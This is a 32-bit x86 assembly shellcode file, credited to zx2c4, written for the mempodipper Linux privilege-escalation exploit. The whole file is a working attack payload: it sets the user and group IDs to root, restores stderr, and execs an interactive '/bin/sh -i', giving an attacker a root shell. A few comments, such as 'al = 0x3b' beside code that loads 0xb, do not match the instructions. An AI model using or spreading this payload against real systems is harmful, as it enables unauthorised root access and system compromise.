BITS 32 ; This shell code sets uid and gid to 0 and execs a shell in interactive mode. ; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper. ; ; by zx2c4 ;setuid(0) xor ebx,ebx mov al,0x17 int 0x80 ;setgid(0) xor ebx,ebx mov al,0x2e int 0x80 ;dup2(6, 2) mov bl,0x6 mov cl,0x2 mov al,0x3f int 0x80 ; execve("//bin/sh", ["//bin/sh", "-i", 0], 0) xor eax,eax ; eax = 0 push eax ; push eax push 0x68732f6e ; push //bin/sh push 0x69622f2f mov ebx,esp ; set ebx (arg 1) to top of stack xor edx,edx ; edx = 0 mov dx,'-i' ; edx = '-i' push edx ; push edx to stack mov eax,esp ; set eax to top of stack xor edx,edx ; edx = 0 ; so at this point: ; ebx is a pointer to '//bin/sh' ; eax is a pointer to '-i' ; edx is null ; since they are all the same size, we'll push them on the stack ; and then it will be an array: push edx ; push edx to stack push eax ; push eax to stack push ebx ; push ebx to stack mov ecx,esp ; set ecx (arg 2) to top of stack xor edx,edx ; rdx (arg 3) = 0 xor eax,eax mov al,0xb ; al = 0x3b, which is the exec call int 0x80